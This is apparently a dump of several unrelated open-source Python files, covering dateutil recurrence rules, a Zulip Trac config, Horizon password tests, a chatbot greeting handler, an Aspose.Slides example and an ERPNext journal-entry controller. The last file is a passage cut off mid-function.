dayset[start:end]: if ((bymonth and ii.mmask[i] not in bymonth) or (byweekno and not ii.wnomask[i]) or (byweekday and ii.wdaymask[i] not in byweekday) or (ii.nwdaymask and not ii.nwdaymask[i]) or (byeaster and not ii.eastermask[i]) or ((bymonthday or bynmonthday) and ii.mdaymask[i] not in bymonthday and ii.nmdaymask[i] not in bynmonthday) or (byyearday and ((i < ii.yearlen and i+1 not in byyearday and -ii.yearlen+i not in byyearday) or (i >= ii.yearlen and i+1-ii.yearlen not in byyearday and -ii.nextyearlen+i-ii.yearlen not in byyearday)))): dayset[i] = None 
filtered = True # Output results if bysetpos and timeset: poslist = [] for pos in bysetpos: if pos < 0: daypos, timepos = divmod(pos, len(timeset)) else: daypos, timepos = divmod(pos-1, len(timeset)) try: i = [x for x in dayset[start:end] if x is not None][daypos] time = timeset[timepos] except IndexError: pass else: date = datetime.date.fromordinal(ii.yearordinal+i) res = datetime.datetime.combine(date, time) if res not in poslist: poslist.append(res) poslist.sort() for res in poslist: if until and res > until: self._len = total return elif res >= self._dtstart: total += 1 yield res if count: count -= 1 if not count: self._len = total return else: for i in dayset[start:end]: if i is not None: date = datetime.date.fromordinal(ii.yearordinal+i) for time in timeset: res = datetime.datetime.combine(date, time) if until and res > until: self._len = total return elif res >= self._dtstart: total += 1 yield res if count: count -= 1 if not count: self._len = total return # Handle frequency and interval fixday = False if freq == YEARLY: year += interval if year > datetime.MAXYEAR: self._len = total return ii.rebuild(year, month) elif freq == MONTHLY: month += interval if month > 12: div, mod = divmod(month, 12) month = mod year += div if month == 0: month = 12 year -= 1 if year > datetime.MAXYEAR: self._len = total return ii.rebuild(year, month) elif freq == WEEKLY: if wkst > weekday: day += -(weekday+1+(6-wkst))+self._interval*7 else: day += -(weekday-wkst)+self._interval*7 weekday = wkst fixday = True elif freq == DAILY: day += interval fixday = True elif freq == HOURLY: if filtered: # Jump to one iteration before next day hour += ((23-hour)//interval)*interval while True: hour += interval div, mod = divmod(hour, 24) if div: hour = mod day += div fixday = True if not byhour or hour in byhour: break timeset = gettimeset(hour, minute, second) elif freq == MINUTELY: if filtered: # Jump to one iteration before next day minute += ((1439-(hour*60+minute))//interval)*interval while True: minute += interval div, mod = divmod(minute, 60) if div: minute = mod hour += div div, mod = divmod(hour, 24) if div: hour = mod day += div fixday = True filtered = False if ((not byhour or hour in byhour) and (not byminute or minute in byminute)): break timeset = gettimeset(hour, minute, second) elif freq == SECONDLY: if filtered: # Jump to one iteration before next day second += (((86399-(hour*3600+minute*60+second)) //interval)*interval) while True: second += self._interval div, mod = divmod(second, 60) if div: second = mod minute += div div, mod = divmod(minute, 60) if div: minute = mod hour += div div, mod = divmod(hour, 24) if div: hour = mod day += div fixday = True if ((not byhour or hour in byhour) and (not byminute or minute in byminute) and (not bysecond or second in bysecond)): break timeset = gettimeset(hour, minute, second) if fixday and day > 28: daysinmonth = calendar.monthrange(year, month)[1] if day > daysinmonth: while day > daysinmonth: day -= daysinmonth month += 1 if month == 13: month = 1 year += 1 if year > datetime.MAXYEAR: self._len = total return daysinmonth = calendar.monthrange(year, month)[1] ii.rebuild(year, month) class _iterinfo(object): __slots__ = ["rrule", "lastyear", "lastmonth", "yearlen", "nextyearlen", "yearordinal", "yearweekday", "mmask", "mrange", "mdaymask", "nmdaymask", "wdaymask", "wnomask", "nwdaymask", "eastermask"] def __init__(self, rrule): for attr in self.__slots__: setattr(self, attr, None) self.rrule = rrule def rebuild(self, year, month): # Every mask is 7 days 
longer to handle cross-year weekly periods. rr = self.rrule if year != self.lastyear: self.yearlen = 365+calendar.isleap(year) self.nextyearlen = 365+calendar.isleap(year+1) firstyday = datetime.date(year, 1, 1) self.yearordinal = firstyday.toordinal() self.yearweekday = firstyday.weekday() wday = datetime.date(year, 1, 1).weekday() if self.yearlen == 365: self.mmask = M365MASK self.mdaymask = MDAY365MASK self.nmdaymask = NMDAY365MASK self.wdaymask = WDAYMASK[wday:] self.mrange = M365RANGE else: self.mmask = M366MASK self.mdaymask = MDAY366MASK self.nmdaymask = NMDAY366MASK self.wdaymask = WDAYMASK[wday:] self.mrange = M366RANGE if not rr._byweekno: self.wnomask = None else: self.wnomask = [0]*(self.yearlen+7) #no1wkst = firstwkst = self.wdaymask.index(rr._wkst) no1wkst = firstwkst = (7-self.yearweekday+rr._wkst)%7 if no1wkst >= 4: no1wkst = 0 # Number of days in the year, plus the days we got # from last year. wyearlen = self.yearlen+(self.yearweekday-rr._wkst)%7 else: # Number of days in the year, minus the days we # left in last year. wyearlen = self.yearlen-no1wkst div, mod = divmod(wyearlen, 7) numweeks = div+mod//4 for n in rr._byweekno: if n < 0: n += numweeks+1 if not (0 < n <= numweeks): continue if n > 1: i = no1wkst+(n-1)*7 if no1wkst != firstwkst: i -= 7-firstwkst else: i = no1wkst for j in range(7): self.wnomask[i] = 1 i += 1 if self.wdaymask[i] == rr._wkst: break if 1 in rr._byweekno: # Check week number 1 of next year as well # TODO: Check -numweeks for next year. i = no1wkst+numweeks*7 if no1wkst != firstwkst: i -= 7-firstwkst if i < self.yearlen: # If week starts in next year, we # don't care about it. for j in range(7): self.wnomask[i] = 1 i += 1 if self.wdaymask[i] == rr._wkst: break if no1wkst: # Check last week number of last year as # well. If no1wkst is 0, either the year # started on week start, or week number 1 # got days from last year, so there are no # days from last year's last week number in # this year. if -1 not in rr._byweekno: lyearweekday = datetime.date(year-1,1,1).weekday() lno1wkst = (7-lyearweekday+rr._wkst)%7 lyearlen = 365+calendar.isleap(year-1) if lno1wkst >= 4: lno1wkst = 0 lnumweeks = 52+(lyearlen+ (lyearweekday-rr._wkst)%7)%7//4 else: lnumweeks = 52+(self.yearlen-no1wkst)%7//4 else: lnumweeks = -1 if lnumweeks in rr._byweekno: for i in range(no1wkst): self.wnomask[i] = 1 if (rr._bynweekday and (month != self.lastmonth or year != self.lastyear)): ranges = [] if rr._freq == YEARLY: if rr._bymonth: for month in rr._bymonth: ranges.append(self.mrange[month-1:month+1]) else: ranges = [(0, self.yearlen)] elif rr._freq == MONTHLY: ranges = [self.mrange[month-1:month+1]] if ranges: # Weekly frequency won't get here, so we may not # care about cross-year weekly periods. 
self.nwdaymask = [0]*self.yearlen for first, last in ranges: last -= 1 for wday, n in rr._bynweekday: if n < 0: i = last+(n+1)*7 i -= (self.wdaymask[i]-wday)%7 else: i = first+(n-1)*7 i += (7-self.wdaymask[i]+wday)%7 if first <= i <= last: self.nwdaymask[i] = 1 if rr._byeaster: self.eastermask = [0]*(self.yearlen+7) eyday = easter.easter(year).toordinal()-self.yearordinal for offset in rr._byeaster: self.eastermask[eyday+offset] = 1 self.lastyear = year self.lastmonth = month def ydayset(self, year, month, day): return range(self.yearlen), 0, self.yearlen def mdayset(self, year, month, day): set = [None]*self.yearlen start, end = self.mrange[month-1:month+1] for i in range(start, end): set[i] = i return set, start, end def wdayset(self, year, month, day): # We need to handle cross-year weeks here. set = [None]*(self.yearlen+7) i = datetime.date(year, month, day).toordinal()-self.yearordinal start = i for j in range(7): set[i] = i i += 1 #if (not (0 <= i < self.yearlen) or # self.wdaymask[i] == self.rrule._wkst): # This will cross the year boundary, if necessary. if self.wdaymask[i] == self.rrule._wkst: break return set, start, i def ddayset(self, year, month, day): set = [None]*self.yearlen i = datetime.date(year, month, day).toordinal()-self.yearordinal set[i] = i return set, i, i+1 def htimeset(self, hour, minute, second): set = [] rr = self.rrule for minute in rr._byminute: for second in rr._bysecond: set.append(datetime.time(hour, minute, second, tzinfo=rr._tzinfo)) set.sort() return set def mtimeset(self, hour, minute, second): set = [] rr = self.rrule for second in rr._bysecond: set.append(datetime.time(hour, minute, second, tzinfo=rr._tzinfo)) set.sort() return set def stimeset(self, hour, minute, second): return (datetime.time(hour, minute, second, tzinfo=self.rrule._tzinfo),) class rruleset(rrulebase): class _genitem: def __init__(self, genlist, gen): try: self.dt = gen() genlist.append(self) except StopIteration: pass self.genlist = genlist self.gen = gen def next(self): try: self.dt = self.gen() except StopIteration: self.genlist.remove(self) def __cmp__(self, other): return cmp(self.dt, other.dt) def __init__(self, cache=False): rrulebase.__init__(self, cache) self._rrule = [] self._rdate = [] self._exrule = [] self._exdate = [] def rrule(self, rrule): self._rrule.append(rrule) def rdate(self, rdate): self._rdate.append(rdate) def exrule(self, exrule): self._exrule.append(exrule) def exdate(self, exdate): self._exdate.append(exdate) def _iter(self): rlist = [] self._rdate.sort() self._genitem(rlist, iter(self._rdate).next) for gen in [iter(x).next for x in self._rrule]: self._genitem(rlist, gen) rlist.sort() exlist = [] self._exdate.sort() self._genitem(exlist, iter(self._exdate).next) for gen in [iter(x).next for x in self._exrule]: self._genitem(exlist, gen) exlist.sort() lastdt = None total = 0 while rlist: ritem = rlist[0] if not lastdt or lastdt != ritem.dt: while exlist and exlist[0] < ritem: exlist[0].next() exlist.sort() if not exlist or ritem != exlist[0]: total += 1 yield ritem.dt lastdt = ritem.dt ritem.next() rlist.sort() self._len = total class _rrulestr: _freq_map = {"YEARLY": YEARLY, "MONTHLY": MONTHLY, "WEEKLY": WEEKLY, "DAILY": DAILY, "HOURLY": HOURLY, "MINUTELY": MINUTELY, "SECONDLY": SECONDLY} _weekday_map = {"MO":0,"TU":1,"WE":2,"TH":3,"FR":4,"SA":5,"SU":6} def _handle_int(self, rrkwargs, name, value, **kwargs): rrkwargs[name.lower()] = int(value) def _handle_int_list(self, rrkwargs, name, value, **kwargs): rrkwargs[name.lower()] = [int(x) for x in 
value.split(',')] _handle_INTERVAL = _handle_int _handle_COUNT = _handle_int _handle_BYSETPOS = _handle_int_list _handle_BYMONTH = _handle_int_list _handle_BYMONTHDAY = _handle_int_list _handle_BYYEARDAY = _handle_int_list _handle_BYEASTER = _handle_int_list _handle_BYWEEKNO = _handle_int_list _handle_BYHOUR = _handle_int_list _handle_BYMINUTE = _handle_int_list _handle_BYSECOND = _handle_int_list def _handle_FREQ(self, rrkwargs, name, value, **kwargs): rrkwargs["freq"] = self._freq_map[value] def _handle_UNTIL(self, rrkwargs, name, value, **kwargs): global parser if not parser: from dateutil import parser try: rrkwargs["until"] = parser.parse(value, ignoretz=kwargs.get("ignoretz"), tzinfos=kwargs.get("tzinfos")) except ValueError: raise ValueError, "invalid until date" def _handle_WKST(self, rrkwargs, name, value, **kwargs): rrkwargs["wkst"] = self._weekday_map[value] def _handle_BYWEEKDAY(self, rrkwargs, name, value, **kwarsg): l = [] for wday in value.split(','): for i in range(len(wday)): if wday[i] not in '+-0123456789': break n = wday[:i] or None w = wday[i:] if n: n = int(n) l.append(weekdays[self._weekday_map[w]](n)) rrkwargs["byweekday"] = l _handle_BYDAY = _handle_BYWEEKDAY def _parse_rfc_rrule(self, line, dtstart=None, cache=False, ignoretz=False, tzinfos=None): if line.find(':') != -1: name, value = line.split(':') if name != "RRULE": raise ValueError, "unknown parameter name" else: value = line rrkwargs = {} for pair in value.split(';'): name, value = pair.split('=') name = name.upper() value = value.upper() try: getattr(self, "_handle_"+name)(rrkwargs, name, value, ignoretz=ignoretz, tzinfos=tzinfos) except AttributeError: raise ValueError, "unknown parameter '%s'" % name except (KeyError, ValueError): raise ValueError, "invalid '%s': %s" % (name, value) return rrule(dtstart=dtstart, cache=cache, **rrkwargs) def _parse_rfc(self, s, dtstart=None, cache=False, unfold=False, forceset=False, compatible=False, ignoretz=False, tzinfos=None): global parser if compatible: forceset = True unfold = True s = s.upper() if not s.strip(): raise ValueError, "empty string" if unfold: lines = s.splitlines() i = 0 while i < len(lines): line = lines[i].rstrip() if not line: del lines[i] elif i > 0 and line[0] == " ": lines[i-1] += line[1:] del lines[i] else: i += 1 else: lines = s.split() if (not forceset and len(lines) == 1 and (s.find(':') == -1 or s.startswith('RRULE:'))): return self._parse_rfc_rrule(lines[0], cache=cache, dtstart=dtstart, ignoretz=ignoretz, tzinfos=tzinfos) else: rrulevals = [] rdatevals = [] exrulevals = [] exdatevals = [] for line in lines: if not line: continue if line.find(':') == -1: name = "RRULE" value = line else: name, value = line.split(':', 1) parms = name.split(';') if not parms: raise ValueError, "empty property name" name = parms[0] parms = parms[1:] if name == "RRULE": for parm in parms: raise ValueError, "unsupported RRULE parm: "+parm rrulevals.append(value) elif name == "RDATE": for parm in parms: if parm != "VALUE=DATE-TIME": raise ValueError, "unsupported RDATE parm: "+parm rdatevals.append(value) elif name == "EXRULE": for parm in parms: raise ValueError, "unsupported EXRULE parm: "+parm exrulevals.append(value) elif name == "EXDATE": for parm in parms: if parm != "VALUE=DATE-TIME": raise ValueError, "unsupported RDATE parm: "+parm exdatevals.append(value) elif name == "DTSTART": for parm in parms: raise ValueError, "unsupported DTSTART parm: "+parm if not parser: from dateutil import parser dtstart = parser.parse(value, ignoretz=ignoretz, 
tzinfos=tzinfos) else: raise ValueError, "unsupported property: "+name if (forceset or len(rrulevals) > 1 or rdatevals or exrulevals or exdatevals): if not parser and (rdatevals or exdatevals): from dateutil import parser set = rruleset(cache=cache) for value in rrulevals: set.rrule(self._parse_rfc_rrule(value, dtstart=dtstart, ignoretz=ignoretz, tzinfos=tzinfos)) for value in rdatevals: for datestr in value.split(','): set.rdate(parser.parse(datestr, ignoretz=ignoretz, tzinfos=tzinfos)) for value in exrulevals: set.exrule(self._parse_rfc_rrule(value, dtstart=dtstart, ignoretz=ignoretz, tzinfos=tzinfos)) for value in exdatevals: for datestr in value.split(','): set.exdate(parser.parse(datestr, ignoretz=ignoretz, tzinfos=tzinfos)) if compatible and dtstart: set.rdate(dtstart) return set else: return self._parse_rfc_rrule(rrulevals[0], dtstart=dtstart, cache=cache, ignoretz=ignoretz, tzinfos=tzinfos) def __call__(self, s, **kwargs): return self._parse_rfc(s, **kwargs) rrulestr = _rrulestr() # vim:ts=4:sw=4:et
Qgap/zulip
refs/heads/master
api/integrations/trac/zulip_trac_config.py
121
# -*- coding: utf-8 -*- # # Copyright © 2012 Zulip, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # See zulip_trac.py for installation and configuration instructions # Change these constants to configure the plugin: ZULIP_USER = "trac-bot@example.com" ZULIP_API_KEY = "0123456789abcdef0123456789abcdef" STREAM_FOR_NOTIFICATIONS = "trac" TRAC_BASE_TICKET_URL = "https://trac.example.com/ticket" # Most people find that having every change in Trac result in a # notification is too noisy -- in particular, when someone goes # through recategorizing a bunch of tickets, that can often be noisy # and annoying. We solve this issue by only sending a notification # for changes to the fields listed below. # # Total list of possible fields is: # (priority, milestone, cc, owner, keywords, component, severity, # type, versions, description, resolution, summary, comment) # # The following is the list of fields which can be changed without # triggering a Zulip notification; change these to match your team's # workflow. TRAC_NOTIFY_FIELDS = ["description", "summary", "resolution", "comment", "owner"] ## If properly installed, the Zulip API should be in your import ## path, but if not, set a custom path below ZULIP_API_PATH = None # Set this to your Zulip API server URI ZULIP_SITE = "https://api.zulip.com"
clouserw/zamboni
refs/heads/master
mkt/__init__.py
19
import threading

from mkt.constants import (categories, comm, platforms, iarc_mappings,  # noqa
                           ratingsbodies)
from mkt.constants.applications import *  # noqa
from mkt.constants.base import *  # noqa
from mkt.constants.payments import *  # noqa
from mkt.constants.platforms import *  # noqa
from mkt.constants.search import *  # noqa
from mkt.constants.submit import *  # noqa
# This is used in multiple other files to access logging, do not remove.
from mkt.site.log import (_LOG, LOG, LOG_BY_ID, LOG_ADMINS, LOG_EDITORS,  # noqa
                          LOG_HIDE_DEVELOPER, LOG_KEEP, LOG_REVIEW_QUEUE,
                          LOG_REVIEW_EMAIL_USER, log)


_locals = threading.local()
_locals.user = None


def get_user():
    return getattr(_locals, 'user', None)


def set_user(user):
    _locals.user = user
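A minimal usage sketch of the thread-local helpers above; the string is just a stand-in for a real user object, and importing mkt assumes the package and its constants are available.

# Usage sketch for set_user()/get_user(); 'some-user' is a placeholder object.
import mkt

mkt.set_user('some-user')
assert mkt.get_user() == 'some-user'
mkt.set_user(None)
assert mkt.get_user() is None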
Daniex/horizon
refs/heads/stable/kilo
openstack_dashboard/dashboards/settings/password/tests.py
26
# Copyright 2013 Centrin Data Systems Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import django from django.conf import settings from django.core.urlresolvers import reverse from django import http from django.utils.six.moves.urllib.parse import urlsplit # noqa from django.utils import unittest from mox import IsA # noqa from openstack_dashboard import api from openstack_dashboard.test import helpers as test INDEX_URL = reverse('horizon:settings:password:index') class ChangePasswordTests(test.TestCase): @test.create_stubs({api.keystone: ('user_update_own_password', )}) def test_change_password(self): api.keystone.user_update_own_password(IsA(http.HttpRequest), 'oldpwd', 'normalpwd',).AndReturn(None) self.mox.ReplayAll() formData = {'method': 'PasswordForm', 'current_password': 'oldpwd', 'new_password': 'normalpwd', 'confirm_password': 'normalpwd'} res = self.client.post(INDEX_URL, formData) self.assertNoFormErrors(res) def test_change_validation_passwords_not_matching(self): formData = {'method': 'PasswordForm', 'current_password': 'currpasswd', 'new_password': 'testpassword', 'confirm_password': 'doesnotmatch'} res = self.client.post(INDEX_URL, formData) self.assertFormError(res, "form", None, ['Passwords do not match.']) @unittest.skipUnless(django.VERSION[0] >= 1 and django.VERSION[1] >= 6, "'HttpResponseRedirect' object has no attribute " "'url' prior to Django 1.6") @test.create_stubs({api.keystone: ('user_update_own_password', )}) def test_change_password_sets_logout_reason(self): api.keystone.user_update_own_password(IsA(http.HttpRequest), 'oldpwd', 'normalpwd').AndReturn(None) self.mox.ReplayAll() formData = {'method': 'PasswordForm', 'current_password': 'oldpwd', 'new_password': 'normalpwd', 'confirm_password': 'normalpwd'} res = self.client.post(INDEX_URL, formData, follow=False) self.assertRedirectsNoFollow(res, settings.LOGOUT_URL) self.assertIn('logout_reason', res.cookies) self.assertEqual(res.cookies['logout_reason'].value, "Password changed. Please log in again to continue.") scheme, netloc, path, query, fragment = urlsplit(res.url) redirect_response = res.client.get(path, http.QueryDict(query)) self.assertRedirectsNoFollow(redirect_response, settings.LOGIN_URL)
Jorge-Rodriguez/ansible
refs/heads/devel
test/integration/targets/module_utils/module_utils/a/b/c/d/e/f/g/h/__init__.py
298
data = 'abcdefgh'
harikrishnakanchi/jeeves
refs/heads/master
segregator/segregator.py
1
from core.strategies import strategies
from grammifier.grammifier import Grammifier
from strategist.strategist import Strategist
from datetime import datetime
from utils.say import say
import nltk

times = {
    "morning": xrange(0, 12),
    "afternoon": xrange(12, 16),
    "evening": xrange(16, 20),
    "night": xrange(20, 24)
}


class Segregator:
    def __init__(self, sentence):
        self.words = nltk.word_tokenize(sentence)

    def check_if_greeting(self):
        greetings = ['morning', 'afternoon', 'evening', 'night']
        casual_greetings = ['hello', 'hi', 'hey']
        for greeting in greetings:
            if greeting in self.words:
                self.react(greeting)
                return True
        for casual_greeting in casual_greetings:
            if casual_greeting in self.words:
                self.react_casually(casual_greeting)
                return True
        return False

    def react(self, greeting):
        time_of_day = datetime.now().hour
        if time_of_day not in times[greeting]:
            say("Actually, it's...")
        for key in times.keys():
            if time_of_day in times[key]:
                say("Good %s" % key)
                break

    def segregate_and_react(self):
        if not self.check_if_greeting():
            grammifier = Grammifier(self.words)
            print("Referrer is %s" % grammifier.get_referrer())
            mental_state = grammifier.get_stemmed_mental_state()
            action_type = grammifier.get_action_type()
            strategist = Strategist(strategies)
            strategist.get_strategy_for(mental_state, action_type)

    def react_casually(self, casual_greeting):
        say(casual_greeting)
ali-salman/Aspose.Slides-for-Java
refs/heads/master
Plugins/Aspose-Slides-Java-for-Jython/asposeslides/WorkingWithShapes/FindShape.py
1
from asposeslides import Settings
from com.aspose.slides import Presentation
from com.aspose.slides import SaveFormat
from com.aspose.slides import XpsOptions

class FindShape:

    def __init__(self):

        dataDir = Settings.dataDir + 'WorkingWithShapes/FindShape/'

        # Create an instance of Presentation class
        pres = Presentation(dataDir + 'demo.pptx')

        # Get the first slide
        slide = pres.getSlides().get_Item(0)

        # Search by alternative text; 'Shape1' is a placeholder value
        shape = self.find_shape(slide, 'Shape1')
        print "Shape: %s" % shape

    def find_shape(self, slide, alttext):
        # Iterate through all shapes inside the slide
        i = 0
        slide_size = slide.getShapes().size()
        while i < slide_size:
            # If the alternative text of the shape matches the required one, return the shape
            if slide.getShapes().get_Item(i).getAlternativeText() == alttext:
                return slide.getShapes().get_Item(i)
            i += 1
        return None

if __name__ == '__main__':
    FindShape()
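For reference, a hedged standalone sketch of the same lookup without the class wrapper; it reuses only the Aspose.Slides calls already shown above, and 'Shape1' is again a placeholder alternative text.

# Find a shape by alternative text on the first slide; 'Shape1' is a placeholder.
from asposeslides import Settings
from com.aspose.slides import Presentation

pres = Presentation(Settings.dataDir + 'WorkingWithShapes/FindShape/demo.pptx')
slide = pres.getSlides().get_Item(0)

found = None
for i in range(slide.getShapes().size()):
    if slide.getShapes().get_Item(i).getAlternativeText() == 'Shape1':
        found = slide.getShapes().get_Item(i)
        break

print "Found shape: %s" % found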
Drooids/erpnext
refs/heads/develop
erpnext/accounts/doctype/journal_entry/journal_entry.py
10
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import cstr, flt, fmt_money, formatdate, getdate, date_diff from frappe import msgprint, _, scrub from erpnext.setup.utils import get_company_currency from erpnext.controllers.accounts_controller import AccountsController from erpnext.accounts.utils import get_balance_on class JournalEntry(AccountsController): def __init__(self, arg1, arg2=None): super(JournalEntry, self).__init__(arg1, arg2) def get_feed(self): return self.voucher_type def validate(self): if not self.is_opening: self.is_opening='No' self.clearance_date = None super(JournalEntry, self).validate_date_with_fiscal_year() self.validate_party() self.validate_cheque_info() self.validate_entries_for_advance() self.validate_debit_and_credit() self.validate_against_jv() self.validate_against_sales_invoice() self.validate_against_purchase_invoice() self.set_against_account() self.create_remarks() self.set_print_format_fields() self.validate_against_sales_order() self.validate_against_purchase_order() self.check_due_date() self.validate_expense_claim() self.validate_credit_debit_note() self.validate_empty_accounts_table() self.set_title() def on_submit(self): self.check_credit_limit() self.make_gl_entries() self.update_advance_paid() self.update_expense_claim() def set_title(self): self.title = self.pay_to_recd_from or self.accounts[0].account def update_advance_paid(self): advance_paid = frappe._dict() for d in self.get("accounts"): if d.is_advance: if d.against_sales_order: advance_paid.setdefault("Sales Order", []).append(d.against_sales_order) elif d.against_purchase_order: advance_paid.setdefault("Purchase Order", []).append(d.against_purchase_order) for voucher_type, order_list in advance_paid.items(): for voucher_no in list(set(order_list)): frappe.get_doc(voucher_type, voucher_no).set_total_advance_paid() def on_cancel(self): from erpnext.accounts.utils import remove_against_link_from_jv remove_against_link_from_jv(self.doctype, self.name, "against_jv") self.make_gl_entries(1) self.update_advance_paid() self.update_expense_claim() def validate_party(self): for d in self.get("accounts"): account_type = frappe.db.get_value("Account", d.account, "account_type") if account_type in ["Receivable", "Payable"]: if not (d.party_type and d.party): frappe.throw(_("Row {0}: Party Type and Party is required for Receivable / Payable account {1}").format(d.idx, d.account)) elif d.party_type and d.party: frappe.throw(_("Row {0}: Party Type and Party is only applicable against Receivable / Payable account").format(d.idx)) def check_credit_limit(self): customers = list(set([d.party for d in self.get("accounts") if d.party_type=="Customer" and d.party and flt(d.debit) > 0])) if customers: from erpnext.selling.doctype.customer.customer import check_credit_limit for customer in customers: check_credit_limit(customer, self.company) def check_due_date(self): if self.cheque_date: for d in self.get("accounts"): if d.party_type and d.party and d.get("credit" if d.party_type=="Customer" else "debit") > 0: due_date = None if d.against_invoice: due_date = frappe.db.get_value("Sales Invoice", d.against_invoice, "due_date") elif d.against_voucher: due_date = frappe.db.get_value("Purchase Invoice", d.against_voucher, "due_date") if due_date and getdate(self.cheque_date) > getdate(due_date): diff = date_diff(self.cheque_date, due_date) if diff > 0: 
msgprint(_("Note: Reference Date exceeds invoice due date by {0} days for {1} {2}") .format(diff, d.party_type, d.party)) def validate_cheque_info(self): if self.voucher_type in ['Bank Entry']: if not self.cheque_no or not self.cheque_date: msgprint(_("Reference No & Reference Date is required for {0}").format(self.voucher_type), raise_exception=1) if self.cheque_date and not self.cheque_no: msgprint(_("Reference No is mandatory if you entered Reference Date"), raise_exception=1) def validate_entries_for_advance(self): for d in self.get('accounts'): if not (d.against_voucher and d.against_invoice and d.against_jv): if (d.party_type == 'Customer' and flt(d.credit) > 0) or \ (d.party_type == 'Supplier' and flt(d.debit) > 0): if not d.is_advance: msgprint(_("Row {0}: Please check 'Is Advance' against Account {1} if this is an advance entry.").format(d.idx, d.account)) elif (d.against_sales_order or d.against_purchase_order) and d.is_advance != "Yes": frappe.throw(_("Row {0}: Payment against Sales/Purchase Order should always be marked as advance").format(d.idx)) def validate_against_jv(self): for d in self.get('accounts'): if d.against_jv: account_root_type = frappe.db.get_value("Account", d.account, "root_type") if account_root_type == "Asset" and flt(d.debit) > 0: frappe.throw(_("For {0}, only credit accounts can be linked against another debit entry") .format(d.account)) elif account_root_type == "Liability" and flt(d.credit) > 0: frappe.throw(_("For {0}, only debit accounts can be linked against another credit entry") .format(d.account)) if d.against_jv == self.name: frappe.throw(_("You can not enter current voucher in 'Against Journal Entry' column")) against_entries = frappe.db.sql("""select * from `tabJournal Entry Account` where account = %s and docstatus = 1 and parent = %s and ifnull(against_jv, '') = '' and ifnull(against_invoice, '') = '' and ifnull(against_voucher, '') = ''""", (d.account, d.against_jv), as_dict=True) if not against_entries: frappe.throw(_("Journal Entry {0} does not have account {1} or already matched against other voucher") .format(d.against_jv, d.account)) else: dr_or_cr = "debit" if d.credit > 0 else "credit" valid = False for jvd in against_entries: if flt(jvd[dr_or_cr]) > 0: valid = True if not valid: frappe.throw(_("Against Journal Entry {0} does not have any unmatched {1} entry") .format(d.against_jv, dr_or_cr)) def validate_against_sales_invoice(self): payment_against_voucher = self.validate_account_in_against_voucher("against_invoice", "Sales Invoice") self.validate_against_invoice_fields("Sales Invoice", payment_against_voucher) def validate_against_purchase_invoice(self): payment_against_voucher = self.validate_account_in_against_voucher("against_voucher", "Purchase Invoice") self.validate_against_invoice_fields("Purchase Invoice", payment_against_voucher) def validate_against_sales_order(self): payment_against_voucher = self.validate_account_in_against_voucher("against_sales_order", "Sales Order") self.validate_against_order_fields("Sales Order", payment_against_voucher) def validate_against_purchase_order(self): payment_against_voucher = self.validate_account_in_against_voucher("against_purchase_order", "Purchase Order") self.validate_against_order_fields("Purchase Order", payment_against_voucher) def validate_account_in_against_voucher(self, against_field, doctype): payment_against_voucher = frappe._dict() field_dict = {'Sales Invoice': ["Customer", "Debit To"], 'Purchase Invoice': ["Supplier", "Credit To"], 'Sales Order': ["Customer"], 'Purchase 
Order': ["Supplier"] } for d in self.get("accounts"): if d.get(against_field): dr_or_cr = "credit" if against_field in ["against_invoice", "against_sales_order"] \ else "debit" if against_field in ["against_invoice", "against_sales_order"] and flt(d.debit) > 0: frappe.throw(_("Row {0}: Debit entry can not be linked with a {1}").format(d.idx, doctype)) if against_field in ["against_voucher", "against_purchase_order"] and flt(d.credit) > 0: frappe.throw(_("Row {0}: Credit entry can not be linked with a {1}").format(d.idx, doctype)) against_voucher = frappe.db.get_value(doctype, d.get(against_field), [scrub(dt) for dt in field_dict.get(doctype)]) if against_field in ["against_invoice", "against_voucher"]: if (against_voucher[0] !=d.party or against_voucher[1] != d.account): frappe.throw(_("Row {0}: Party / Account does not match with \ Customer / Debit To in {1}").format(d.idx, doctype)) else: payment_against_voucher.setdefault(d.get(against_field), []).append(flt(d.get(dr_or_cr))) if against_field in ["against_sales_order", "against_purchase_order"]: if against_voucher != d.party: frappe.throw(_("Row {0}: {1} {2} does not match with {3}") \ .format(d.idx, d.party_type, d.party, doctype)) elif d.is_advance == "Yes": payment_against_voucher.setdefault(d.get(against_field), []).append(flt(d.get(dr_or_cr))) return payment_against_voucher def validate_against_invoice_fields(self, doctype, payment_against_voucher): for voucher_no, payment_list in payment_against_voucher.items(): voucher_properties = frappe.db.get_value(doctype, voucher_no, ["docstatus", "outstanding_amount"]) if voucher_properties[0] != 1: frappe.throw(_("{0} {1} is not submitted").format(doctype, voucher_no)) if flt(voucher_properties[1]) < flt(sum(payment_list)): frappe.throw(_("Payment against {0} {1} cannot be greater \ than Outstanding Amount {2}").format(doctype, voucher_no, voucher_properties[1])) def validate_against_order_fields(self, doctype, payment_against_voucher): for voucher_no, payment_list in payment_against_voucher.items(): voucher_properties = frappe.db.get_value(doctype, voucher_no, ["docstatus", "per_billed", "status", "advance_paid", "base_grand_total"]) if voucher_properties[0] != 1: frappe.throw(_("{0} {1} is not submitted").format(doctype, voucher_no)) if flt(voucher_properties[1]) >= 100: frappe.throw(_("{0} {1} is fully billed").format(doctype, voucher_no)) if cstr(voucher_properties[2]) == 